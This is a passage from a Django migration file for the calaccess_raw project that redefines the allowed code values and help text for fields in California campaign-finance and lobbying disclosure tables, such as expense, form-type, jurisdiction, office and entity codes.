'Unknown'), ('MRB', 'Unknown'), ('NGP', 'Unknown'), ('NON', 'Unknown'), ('NOT', 'Unknown'), ('NOV', 'Unknown'), ('O', 'Unknown'), ('OCT', 'Unknown'), ('.OF', 'Unknown'), ('OFF', 'Unknown'), ('OPE', 'Unknown'), ('OTH', 'Unknown'), ('P', 'Unknown'), ('Pac', 'Unknown'), ('PAI', 'Unknown'), ('PAR', 'Unknown'), ('PAY', 'Unknown'), ('PEN', 'Unknown'), ('PMT', 'Unknown'), ('.PO', 'Unknown'), ('Pos', 'Unknown'), ('PRE', 'Unknown'), ('PRI', 'Unknown'), ('PRP', 'Unknown'), ('R', 'Unknown'), ('.Re', 'Unknown'), ('.RE', 'Unknown'), ('REF', 'Unknown'), ('REI', 'Unknown'), ('RFP', 'Unknown'), ('S', 'Unknown'), ('S-A', 'Unknown'), ('SA', 'Unknown'), ('Sal', 'Unknown'), ('S C', 'Unknown'), ('S.C', 'Unknown'), ('SCU', 'Unknown'), ('SEE', 'Unknown'), ('SEN', 'Unknown'), ('SEP', 'Unknown'), ('S.M.', 'Unknown'), ('SOF', 'Unknown'), ('SWI', 'Unknown'), ('T', 'Unknown'), ('TAX', 'Unknown'), ('TB', 'Unknown'), ('TB,', 'Unknown'), ('TIC', 'Unknown'), ('Tor', 'Unknown'), ('TRA', 'Unknown'), ('TRF', 'Unknown'), ('TRV', 'Unknown'), ('UN', 'Unknown'), ('UTI', 'Unknown'), ('V', 'Unknown'), ('VEN', 'Unknown'), ('-VO', 'Unknown'), ('VOI', 'Unknown'), ('VOY', 'Unknown'), ('WI', 'Unknown'), ('x', 'Unknown'), ('X', 'Unknown'), ('S-6', 'Unknown'), ('S.M', 'Unknown'), ('S-4', 'Unknown'), ('SA:', 'Unknown'), ('100', 'Unknown'), ('RFN', 'Unknown'), ('REN', 'Unknown'), ('003', 'Unknown'), ('S-1', 'Unknown'), ('08', 'Unknown')], db_column='EXPN_CODE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=11), calaccess_raw.annotations.DocumentCloud(end_page=14, id='2712034-Cal-Format-201', start_page=13)], help_text='The type of expenditure', max_length=3, verbose_name='expense code'),
),
migrations.AlterField(
model_name='expncd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F450P5', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 5, Payments Made'), ('D', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule D, Summary of Expenditures Supporting / Opposing Other Candidates, Measures and Committees'), ('E', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule E, Payments Made'), ('G', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule G, Payments Made by an Agent or Independent Contractor (on Behalf of This Committee)'), ('F461P5', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 5, Contributions (Including Loans, Forgiveness of Loans, and LoanGuarantees) and Expenditures Made'), ('F465P3', 'Form 465 (Supplemental Independent Expenditure Report): Part 3, Independent Expenditures Made'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=31), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=42)], help_text='Name of the source filing form or schedule', max_length=6),
),
migrations.AlterField(
model_name='expncd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('Cit', 'City'), ('sen', 'Senate District'), ('Sen', 'Senate District'), ('stw', 'Statewide'), ('APP', 'Statewide'), ('ASR', 'County'), ('ATT', 'Statewide'), ('GOV', 'Statewide'), ('LTG', 'Statewide'), ('SOS', 'Statewide'), ('SUP', 'Statewide'), ('TRE', 'Statewide'), ('BSU', 'County'), ('CSU', 'County'), ('ES', 'City'), ('SM', 'City'), ('BED', 'Other'), ('CCB', 'Other'), ('CCM', 'Other'), ('PDR', 'Other'), ('12', 'Senate District'), ('4', 'Statewide'), ('8', 'Statewide'), ('27', 'Statewide'), ('93', 'Statewide'), ('98', 'Statewide'), ('CLB', 'Unknown'), ('PER', 'Unknown'), ('Boa', 'Board of Equalization District'), ('Sta', 'Unknown'), ('STA', 'Unknown'), ('CA', 'Unknown'), ('SAN', 'Unknown'), ('ES ', 'Unknown'), ('CON', 'Unknown'), ('LA', 'Unknown'), ('LBC', 'Unknown'), ('OR', 'Unknown'), ('SB', 'Unknown'), ('WES', 'Unknown'), ('BM', 'Unknown'), ('(Lo', 'Unknown'), ('(Ci', 'Unknown'), ('vty', 'Unknown'), ('OC', 'Unknown'), ('SM ', 'Unknown'), ('ASS', 'Unknown'), ('JR', 'Unknown'), ('O', 'Unknown'), ('ADM', 'Unknown'), ('SAC', 'Unknown'), ('US', 'Unknown'), ('J', 'Unknown'), ('LOS', 'Unknown'), ('IRV', 'Unknown'), ('CO', 'Unknown'), ('JRS', 'Unknown'), ('NEV', 'Unknown'), ('IB', 'Unknown'), ('A', 'Unknown'), ('Ass', 'Unknown'), ('SD', 'Unknown'), ('D', 'Unknown'), ('SEC', 'Unknown'), ('SC', 'Unknown'), ('RB', 'Unknown'), ('GEN', 'Unknown'), ('CC', 'Unknown'), ('FED', 'Unknown'), ('FM', 'Unknown'), ('R', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=32), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=44)], help_text='Office Jurisdiction Code', max_length=3),
),
migrations.AlterField(
model_name='expncd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT'), ('s', 'SOUGHT'), ('h', 'HELD'), ('A', 'UNKNOWN'), ('a', 'UNKNOWN'), ('8', 'UNKNOWN'), ('O', 'UNKNOWN')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=32), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=44)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='expncd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('Cou', 'County Counsel'), ('sen', 'State Senator'), ('AtT', 'Attorney General'), ('May', 'Mayor'), ('Sen', 'State Senator'), ('asm', 'State Assembly Person'), ('gov', 'Governor'), ('Gov', 'Governor'), ('LA', 'Unknown'), ('HOU', 'Unknown'), ('LAD', 'Unknown'), ('11A', 'Unknown'), ('001', 'Unknown'), ('BM', 'Unknown'), ('AS1', 'Unknown'), ('ASS', 'Unknown'), ('73', 'Unknown'), ('CIT', 'Unknown'), ('HSE', 'Unknown'), ('LT', 'Unknown'), ('CTY', 'Unknown'), ('STA', 'Unknown'), ('GO', 'Unknown'), ('CO', 'Unknown'), ('A', 'Unknown'), ('PAC', 'Unknown'), ('REP', 'Unknown'), ('OFF', 'Unknown'), ('SE', 'Unknown'), ('031', 'Unknown'), ('COM', 'Unknown'), ('ASB', 'Unknown'), ('OT', 'Unknown'), ('NAT', 'Unknown'), ('CC', 'Unknown'), ('SWE', 'Unknown'), ('FED', 'Unknown'), ('STE', 'Unknown'), ('H', 'Unknown'), ('DA', 'Unknown'), ('S', 'Unknown'), ('AS', 'Unknown'), ('OF', 'Unknown'), ('LEG', 'Unknown'), ('STW', 'Unknown'), ('ST', 'Unknown'), ('PRE', 'Unknown'), ('/S', 'Unknown'), ('U S', 'Unknown'), ('O', 'Unknown'), ('8', 'Unknown'), ('C:S', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='expncd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT'), ('s', 'SUPPORT'), ('o', 'OPPOSITION'), ('H', 'UNKNOWN'), ('N', 'UNKNOWN'), ('X', 'UNKNOWN'), ('Y', 'UNKNOWN')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=32), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=44)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='f495p2cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F495', 'Form 495: Supplemental Pre-Election Campaign Statement (Recipient Committee)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=26), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=35)], help_text='Name of the source filing form to which the Form 495 is attached (must equal Form_Type in CVR record)', max_length=4),
),
migrations.AlterField(
model_name='f501502cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATH', 'Authorizing individual'), ('ATR', 'Assistant treasurer'), ('BMC', 'Ballot measure committee'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('IND', 'Individual'), ('MDI', 'Major Donor/Ind Expenditure'), ('OFF', 'Officer'), ('OTH', 'Other'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('SMO', 'Slate-mailer organization'), ('SPO', 'Sponsor'), ('TRE', 'Treasurer'), ('8', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9)], help_text='Entity code', max_length=9),
),
migrations.AlterField(
model_name='f501502cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F501', 'Form 501: Candidate Intention Statement'), ('F502', 'Form 502: Campaign Bank Account Statement')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=58)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='f690p2cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=58), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=72)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='filerfilingscd',
name='form_id',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F405', 'Form 405: Amendment to Campaign Disclosure Statement'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F415', 'Form 415: Title Unknown'), ('F416', 'Form 416: Title Unknown'), ('F419', 'Form 419: Campaign Disclosure Statement, Long Form (Ballot Measure Committee)'), ('F420', 'Form 420: Campaign Disclosure Statement, Long Form (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F430', 'Form 430: Title Unknown'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F470', 'Form 470: Campaign Disclosure Statement, Short Form (Officeholders and Candidates)'), ('F490', 'Form 490: Campaign Disclosure Statement, Long Form (Officeholders and Candidates)'), ('F495', 'Form 495: Supplemental Pre-Election Campaign Statement (Recipient Committee)'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F501', 'Form 501: Candidate Intention Statement'), ('F502', 'Form 502: Campaign Bank Account Statement'), ('F511', 'Form 511: Paid Spokesperson Report'), ('E530', 'Electronic Form 530: Electronic Issue Advocacy Report'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F605', 'Form 605: Amendment to Registration, Lobbying Firm, Lobbyist Employer, Lobbying Coalition'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('S630', 'Schedule 630: Payments Made to Lobbying Coalitions (Attachment to Form 625 or 635) '), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('S635-C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('F690', 'Form 690: Amendment to Lobbying Disclosure Report'), ('F700', 'Form 700: Statement of Economic Interest'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)'), ('F111', 'Unknown'), ('F410 AT', 'Unknown'), ('F410ATR', 'Unknown'), ('F421', 'Unknown'), ('F440', 'Unknown'), ('F470S', 'Form 470: Campaign Disclosure Statement, Short Form (Officeholders and Candidates)'), ('F480', 'Unknown'), ('F500', 'Unknown'), ('F501502', 'Forms 501 and/or 502 (Candidate Intention and/or Bank Account Statements)'), ('F555', 'Unknown'), ('F666', 'Unknown'), ('F777', 'Unknown'), ('F888', 'Unknown'), ('F999', 'Unknown')], db_column='FORM_ID', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=65)], help_text='Form identification code', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='headercd',
name='form_id',
field=calaccess_raw.fields.CharField(choices=[('AF490', 'Form 490, Part A'), ('AP1', 'Allocation Part 1'), ('AP2', 'Allocation Part 2'), ('BF490', 'Form 490, Part B'), ('CF490', 'Form 490, Part C'), ('DF490', 'Form 490, Part D'), ('EF490', 'Form 490, Part E'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('FF490', 'Form 490, Part F'), ('HF490', 'Form 490, Part H'), ('IF490', 'Form 490, Part I')], db_column='FORM_ID', help_text='Form identification code', max_length=5, verbose_name='Form ID'),
),
migrations.AlterField(
model_name='lattcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('FRM', 'Lobbying Firm'), ('IND', 'Person (spending > $5000)'), ('LBY', 'Lobbyist (an individual)'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer'), ('OTH', 'Other'), ('RCP', 'Recipient Committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=65), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=80)], help_text='Entity Code of the Payment Recipient/Payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lattcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('S630', 'Schedule 630: Payments Made to Lobbying Coalitions (Attachment to Form 625 or 635) '), ('S635-C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=52), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=65), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=79)], help_text='Name of the source filing form or schedule', max_length=6),
),
migrations.AlterField(
model_name='lccmcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('RCP', 'Recipient Committee'), ('CTL', 'Controlled committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=64), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=78)], help_text='Entity Code for Recipient of the Campaign Contribution Value', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lccmcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615P2', 'Form 615 (Lobbyist Report): Part 2, Campaign Contributions Made or Delivered'), ('F625P4B', 'Form 625 (Report of Lobbying Firm): Part 4, Campaign Contributions Made'), ('F635P4B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 4, Campaign Contributions Made'), ('F645P3B', 'Form 645 (Report of Person Spending $5,000 or More): Part 3, Campaign Contributions Made')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=64), calaccess_raw.annotations.DocumentCloud(end_page=79, id='2712034-Cal-Format-201', start_page=78)], help_text='Name of the source filing form or schedule', max_length=7),
),
migrations.AlterField(
model_name='lempcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601P2A', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section A, Lobbyist Employers'), ('F601P2B', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section B, Subcontracted Clients')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=75), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=90)], help_text='Name of the source filing form or schedule', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='lexpcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('IND', 'Person (spending > $5000)'), ('OTH', 'Other')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=61), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=75)], help_text='Entity Code of the Payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lexpcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615P1', 'Form 615 (Lobbyist Report): Part 1, Activity Expenses Paid, Incurred, Arranged or Provided by the Lobbyist'), ('F625P3A', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section A, Activity Expenses'), ('F635P3C', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section C, Activity Expenses'), ('F645P2A', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section A, Activity Expenses')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=61), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=74)], help_text='Name of the source filing form or schedule', max_length=7),
),
migrations.AlterField(
model_name='loancd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('IND', 'Individual'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=35), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=47)], help_text='Entity code describing the lender', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='loancd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('B1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 1, Loans Received'), ('B2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 2, Loan Guarantors'), ('B3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 3, Outstanding Balance'), ('H', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Loans Made to Others'), ('H1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 1, Loans Made'), ('H2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 2, Repayments Rcvd'), ('H3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 3, Outstanding Loans')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=35), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=47)], help_text='Name of the source filing form or schedule', max_length=2),
),
migrations.AlterField(
model_name='lobbyamendmentscd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=74), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=88)], help_text='Name of the source filing form or schedule', max_length=9),
),
migrations.AlterField(
model_name='lothcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F625P3B', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section B, Payments Made')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=63), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=77)], help_text='Name of the source filing form or schedule', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='lpaycd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('FRM', 'Lobbying Firm'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer'), ('OTH', 'Other'), ('128', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=62), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=76)], help_text='Entity Code of the Employer Values', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lpaycd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F625P2', 'Form 625 (Report of Lobbying Firm): Part 2, Payments Received in Connection with Lobbying Activity'), ('F635P3B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section B, Payments To Lobbying Firms')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=62), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=76)], help_text='Name of the source filing form or schedule', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='rcptcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('IND', 'Individual'), ('PTY', 'Political Party'), ('OTH', 'Other'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('Com', 'Committee'), ('CAO', 'Candidate/officeholder'), ('BNM', "Ballot measure's name/title"), ('OFF', 'Officer'), ('0', 'Unknown'), ('PTH', 'Unknown'), ('RFD', 'Unknown'), ('MBR', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=71), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=29), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=37), calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9)], help_text='Entity Code describing the contributor', max_length=3),
),
migrations.AlterField(
model_name='rcptcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('E530', 'Electronic Form 530: Electronic Issue Advocacy Report'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)'), ('F401A', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule A, Payments Received'), ('A', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A, Monetary Contributions Received'), ('A-1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A-1, Contributions Transferred to Special Election Commitee'), ('C', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule C, Non-Monetary Contributions Received'), ('I', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule I, Miscellanous increases to cash'), ('F496P3', 'Form 496 (Late Independent Expenditure Report): Part 3, Contributions > $100 Received')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=29), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=37)], help_text='Name of the source filing form or schedule', max_length=9),
),
migrations.AlterField(
model_name='rcptcd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('BED', 'Other'), ('CLB', 'Other'), ('COU', 'County'), ('CO', 'Other'), ('SAC', 'Unknown'), ('PER', 'Unknown'), ('SF', 'Unknown'), ('OR', 'Unknown'), ('AL', 'Unknown'), ('4', 'Unknown'), ('CA', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=74), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=30), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=40)], help_text='Office jurisdiction code. See the CAL document for the list of legal values. Used on Form 401 Schedule A', max_length=3),
),
migrations.AlterField(
model_name='rcptcd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=75), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=30), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=40)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='rcptcd',
name='office_cd',
